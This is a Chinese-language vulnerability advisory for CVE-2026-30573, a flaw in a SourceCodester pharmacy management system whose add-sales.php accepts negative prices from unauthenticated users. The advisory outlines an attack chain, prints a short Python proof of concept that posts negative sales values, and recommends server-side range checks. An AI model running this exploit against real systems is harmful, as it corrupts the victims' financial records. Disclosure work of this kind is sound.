CVE-2026-30573 CVSS 7.5 高危

CVE-2026-30573 SourceCodester药房业务逻辑漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30573

漏洞类型

业务逻辑漏洞

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pharmacy Product Management System

漏洞概述

SourceCodester Pharmacy Product Management System 1.0版本存在严重的业务逻辑漏洞。由于add-sales.php文件未对价格和总成本参数进行有效性验证，允许未经认证的攻击者提交负数值。这破坏了财务数据的完整性，导致销售报告错误和潜在的财务损失。

技术细节

该漏洞位于SourceCodester药房系统的add-sales.php文件中，属于典型的业务逻辑缺陷。系统在处理新增销售请求时，未对用户提交的txtprice（价格）和txttotalcost（总成本）参数进行严格的服务端数值范围校验。攻击者无需任何身份认证即可利用此漏洞，通过构造恶意的HTTP POST请求，将价格字段设置为负数（例如-999）。由于后端缺乏逻辑判断，直接将负数写入数据库，导致销售总额计算异常，破坏了财务数据的完整性，可能造成严重的资产统计混乱。

攻击链分析

STEP 1

侦查

攻击者识别出目标系统运行SourceCodester Pharmacy Product Management System 1.0，并定位到add-sales.php接口。

STEP 2

漏洞利用

攻击者构造包含负数值（如txtprice=-100）的HTTP POST请求，发送至目标接口，无需绕过认证。

STEP 3

影响达成

系统后端处理该请求，将负数销售记录写入数据库，导致财务报表混乱和数据完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-30573
# Target: SourceCodester Pharmacy Product Management System 1.0

target_url = "http://target.com/pharmacy/add-sales.php"

# Malicious payload with negative values
payload = {
    "txtproduct": "1",
    "txtqty": "1",
    "txtprice": "-100",      # Vulnerable parameter: Negative price
    "txttotalcost": "-100"   # Vulnerable parameter: Negative total cost
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check database for negative sales records.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

SourceCodester Pharmacy Product Management System 1.0

防御指南

临时缓解措施

建议立即修改add-sales.php源代码，增加对txtprice和txttotalcost参数的类型及范围检查，确保不接受负值或零值，从而修复业务逻辑缺陷。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表